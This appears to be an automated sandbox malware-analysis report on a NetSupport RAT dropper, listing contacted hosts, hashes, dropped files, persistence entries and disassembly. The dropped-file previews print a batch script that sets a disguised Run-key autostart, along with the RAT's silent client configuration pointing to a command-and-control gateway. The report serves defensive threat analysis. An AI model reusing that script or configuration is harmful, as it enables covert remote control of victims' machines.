http://%s/testpage.htm | bild.exe, bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | false | | high
http://geo.netsupportsoftware.com/location/loca.aspP | bild.exe, 00000004.00000002.3581039024.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.netsupportschool.com/tutor-assistant.asp11( | file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://127.0.0.1 | bild.exe, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://www.symauth.com/cps0( | file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | false | | high
http://www.netsupportschool.com/tutor-assistant.asp | file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://%s/fakeurl.htm | bild.exe, bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | false | | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
45.61.128.74 | unknown | United States | 9009 | M247GB | true
104.26.0.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
General Information
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1556890
Start date and time: 2024-11-16 12:52:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal88.rans.evad.winEXE@11/13@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 186
• Number of non-executed functions: 187
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms or more are ignored
• Processes excluded from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Domains excluded from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded maximum capacity and may be missing behavior information.
• Report size exceeded maximum capacity and may be missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Persistence and autostart
Time | Type | Description
11:53:12 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Public\Videos\Video\bild.exe
11:53:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Public\Videos\Video\bild.exe
Joe Sandbox View: IP context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.26.0.231 | KC0uZWwr8p.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse | geo.netsupportsoftware.com/location/loca.asp
 | KC0uZWwr8p.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse | geo.netsupportsoftware.com/location/loca.asp
 | hkpqXovZtS.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
 | file.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
 | qvoLvRpRbr.msi | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
 | EMX97rT0GX.msi | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
 | Support_auto.msi | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
 | SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
 | SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Get hash | malicious | NetSupport RAT | Browse | geo.netsupportsoftware.com/location/loca.asp
Joe Sandbox View: domain context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
geo.netsupportsoftware.com | KC0uZWwr8p.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse | 104.26.0.231
 | KC0uZWwr8p.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse | 104.26.0.231
 | 72BF1aHUKl.msi | Get hash | malicious | NetSupport RAT | Browse | 172.67.68.212
 | hkpqXovZtS.exe | Get hash | malicious | NetSupport RAT | Browse | 104.26.0.231
 | file.exe | Get hash | malicious | NetSupport RAT | Browse | 104.26.1.231
 | file.exe | Get hash | malicious | NetSupport RAT | Browse | 104.26.1.231
 | CiscoSetup.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse | 172.67.68.212
 | CiscoSetup.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse | 172.67.68.212
 | CiscoSetup.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse | 172.67.68.212
Joe Sandbox View: ASN context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
M247GB | yhYrGCKq9s.exe | Get hash | malicious | RedLine | Browse | 91.202.233.18
 | meerkat.arm.elf | Get hash | malicious | Mirai | Browse | 38.201.237.116
 | botnet.x86.elf | Get hash | malicious | Mirai, Moobot | Browse | 38.207.55.160
 | mips.elf | Get hash | malicious | Unknown | Browse | 213.182.204.57
 | arm7.elf | Get hash | malicious | Unknown | Browse | 213.182.204.57
 | bin.sh.elf | Get hash | malicious | Mirai | Browse | 45.88.100.118
 | sora.mpsl.elf | Get hash | malicious | Mirai | Browse | 38.206.146.185
 | botnet.sh4.elf | Get hash | malicious | Mirai, Moobot | Browse | 173.211.86.154
 | qy8i3kM2Ir.exe | Get hash | malicious | GuLoader, Remcos | Browse | 172.111.244.104
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC | Browse | 172.67.174.133
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse | 172.67.174.133
 | file.exe | Get hash | malicious | LummaC | Browse | 104.21.80.55
 | rSWIFT.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
 | file.exe | Get hash | malicious | LummaC | Browse | 172.67.174.133
 | file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse | 172.64.41.3
 | https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fkese%2F7980321465/eW9vbmp1LmNob0Bib2xsb3JlLmNvbQ== | Get hash | malicious | HTMLPhisher | Browse | 104.18.11.207
 | file.exe | Get hash | malicious | LummaC | Browse | 172.67.174.133
 | TKnBbCiX07.exe | Get hash | malicious | GuLoader | Browse | 172.67.208.107
                                                                  No context
Joe Sandbox View: dropped file context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\Public\Public\Videos\Video\HTCTL32.DLL | KC0uZWwr8p.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse |
 | KC0uZWwr8p.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse |
 | file.exe | Get hash | malicious | NetSupport RAT | Browse |
 | file.exe | Get hash | malicious | NetSupport RAT | Browse |
 | CiscoSetup.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse |
 | CiscoSetup.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse |
 | CiscoSetup.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse |
 | CiscoSetup.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse |
 | Advanced_IP_Scanner_2.5.4594.12.exe | Get hash | malicious | NetSupport RAT, NetSupport Downloader | Browse |
Dropped file: C:\Users\Public\Public\Videos\Video\HTCTL32.DLL
Process: C:\Users\user\Desktop\file.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 328056
Entropy (8bit): 6.754723001562745
Encrypted: false
SSDEEP: 6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
MD5: 2D3B207C8A48148296156E5725426C7F
SHA1: AD464EB7CF5C19C8A443AB5B590440B32DBC618F
SHA-256: EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
SHA-512: 55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
Malicious: false
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\HTCTL32.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                    Joe Sandbox View:
                                                                                    • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                    • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                    • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
Reputation: moderate, very likely benign file
Preview: [MZ/PE header dump omitted; .text, .rdata, .data, .rsrc and .reloc sections present]
Process:C:\Users\user\Desktop\file.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):257
Entropy (8bit):5.119720931145611
Encrypted:false
SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
MD5:7067AF414215EE4C50BFCD3EA43C84F0
SHA1:C331D410672477844A4CA87F43A14E643C863AF9
SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
Malicious:false
Reputation:moderate, very likely benign file
Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..
Process:C:\Users\user\Desktop\file.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18808
Entropy (8bit):6.22028391196942
Encrypted:false
SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
MD5:A0B9388C5F18E27266A31F8C5765B263
SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
Malicious:false
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\PCICHEK.DLL, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
• Antivirus: Virustotal, Detection: 1%
Process:C:\Users\user\Desktop\file.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3735416
Entropy (8bit):6.525042992590476
Encrypted:false
SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
MD5:00587238D16012152C2E951A087F2CC9
SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, Author: Joe Security
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 12%
• Antivirus: Virustotal, Detection: 17%
Process:C:\Users\user\Desktop\file.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):396664
Entropy (8bit):6.809064783360712
Encrypted:false
SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
MD5:EAB603D12705752E3D268D86DFF74ED4
SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
Malicious:true
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\TCCTL32.DLL, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
• Antivirus: Virustotal, Detection: 3%
Process:C:\Users\user\Desktop\file.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):105848
Entropy (8bit):4.68250265552195
Encrypted:false
SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
MD5:8D9709FF7D9C83BD376E01912C734F0A
SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
Malicious:true
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\bild.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 29%
• Antivirus: Virustotal, Detection: 49%
Process:C:\Users\user\Desktop\file.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):700
Entropy (8bit):5.533099732210104
Encrypted:false
SSDEEP:12:Wrqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuZIAlkz6:mqzEmPZly6YBlLoG1fXXfDioIAaz6
MD5:5778ABD7CF2E8039239CD5982281D61A
SHA1:9AA6E80A115343A100031C9473FC6A071EEFD07E
SHA-256:0BD4DC8B66C588F715B117021EF14C959E396F5CC6041F885F0D121401BC267A
SHA-512:DC01567D881D48554732747A286AC9A95EF095B4CB860F384B85636B160778C9EFE366F53550B74D9DDF504B293F03BBB252E5247F03490E4567AD142DEF6E0A
Malicious:false
Preview:0x289612fe....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=45.61.128.74:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....
Process:C:\Users\user\Desktop\file.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):773968
Entropy (8bit):6.901559811406837
Encrypted:false
SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:0E37FBFA79D349D672456923EC5FBBE3
SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\file.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):311
Entropy (8bit):5.308980069606459
Encrypted:false
SSDEEP:6:hwszH1j0KpIAgidquHLNQ+bsWWNQ+bd83OG52LvVJ:HVj0Kprgidqunr2SP2hJ
MD5:4DB329A7BA03593C3D02C5E80068F82A
SHA1:70B77611F440DAC81778F54A316E811F3B3C63A4
SHA-256:7182655A9F8489E5B761C16192F3DE1662114F7AA9938F87E0062F8859DAE7F5
SHA-512:6B34FC8000A457F44BEFB03A8153D7E77CA0B8F44705AB7DF2FED3F52599A9172E9A866938986A36B4376C99260B5D03B5496DD605DBFBBD7BF301FE72D31F83
Malicious:true
Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Public\Videos\Video\bild.exe"..start %Public%\Public\Videos\Video\bild.exe..[HKEY_CURRENT_USER\Software\Supservice.."Supservice"="C:\\Program Files (x86)\\Supservice\\supservice.exe".."Version"="5"]..
Process:C:\Users\user\Desktop\file.exe
File Type:Windows setup INFormation
Category:dropped
Size (bytes):328
Entropy (8bit):4.93007757242403
Encrypted:false
SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:26E28C01461F7E65C402BDF09923D435
SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:false
Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
Process:C:\Users\user\Desktop\file.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):33144
Entropy (8bit):6.737780491933496
Encrypted:false
SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
MD5:DCDE2248D19C778A41AA165866DD52D0
SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
Malicious:true
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\pcicapi.dll, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Process:C:\Users\user\Desktop\file.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):77224
Entropy (8bit):6.793971095882093
Encrypted:false
SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
MD5:325B65F171513086438952A152A747C4
SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 13%
Process: C:\Users\Public\Public\Videos\Video\bild.exe
File Type: ASCII text, with no line terminators
Category: modified
Size (bytes): 15
Entropy (8bit): 2.7329145639793984
Encrypted: false
SSDEEP: 3:QJgTG:QkG
MD5: 8AB0D91EF06123198FFAC30AD08A14C7
SHA1: 46D83BB84F74D8F28427314C6084CC9AFE9D1533
SHA-256: DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
SHA-512: 1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
Malicious: false
Preview: 32.7767,-96.797
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.940330546772841
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'138'286 bytes
MD5: 166d71e145b2c802acd2b0a07e070bad
SHA1: 1c84d2e573e7096040fbe6e950fbff764aa11096
SHA256: 33b22fce68d5d7bd08e86b8506c50bdfcd38c26db5983864e8d33bdf62f53272
SHA512: 5137efaeda15554cf5b8ff68516d91b9cb3e960b85970f535e8735b1705f62cb390ffef4c7b964ed33764cd3b772aaca0ac1468ec67abe7fd2de9ddf2465f6e4
SSDEEP: 49152:VIf3w6NbHHBp7k5hhJ+j0h7x0vRNT1UTzPN0EkHbG+n9:VIfwYt5ShrfKvo1U
TLSH: 61A52302B9D3C5B2D53308350B196F55747DBE303F18CDAAE7C95E1EDA31292A628B63
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~..............b.......b..<....b......)^...................................................... ....... .......%....... ......
Icon Hash: 1515d4d4442f2d2d
Entrypoint: 0x41d779
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 00be6e6c4f9e287672c8301b72bdabf3
Instruction
call 00007FE4789A52DFh
jmp 00007FE4789A4CD3h
cmp ecx, dword ptr [0043A1C8h]
jne 00007FE4789A4E45h
ret
jmp 00007FE4789A5456h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00430FE8h
mov dword ptr [ecx], 00431994h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FE4789983DDh
mov dword ptr [esi], 004319A0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004319A8h
mov dword ptr [ecx], 004319A0h
ret
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00431988h
push eax
call 00007FE4789A7FEEh
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 00431988h
push eax
call 00007FE4789A7FD7h
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FE4789A4E4Ch
push 0000000Ch
push esi
call 00007FE4789A4412h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FE4789A4DAEh
push 00437B58h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FE4789A76D6h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [C++] VS2015 UPD3.1 build 24215
• [EXP] VS2015 UPD3.1 build 24215
• [RES] VS2015 UPD3 build 24213
• [LNK] VS2015 UPD3.1 build 24215
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x38cd0 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x38d04 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5d000 | 0xe034 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0x1fd0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x36ee0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x31928 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x30000 | 0x25c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x38254 | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2e864 | 0x2ea00 | 8c2dd3ebce78edeed565107466ae1d3e | False | 0.5908595844504021 | data | 6.693477406609911 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
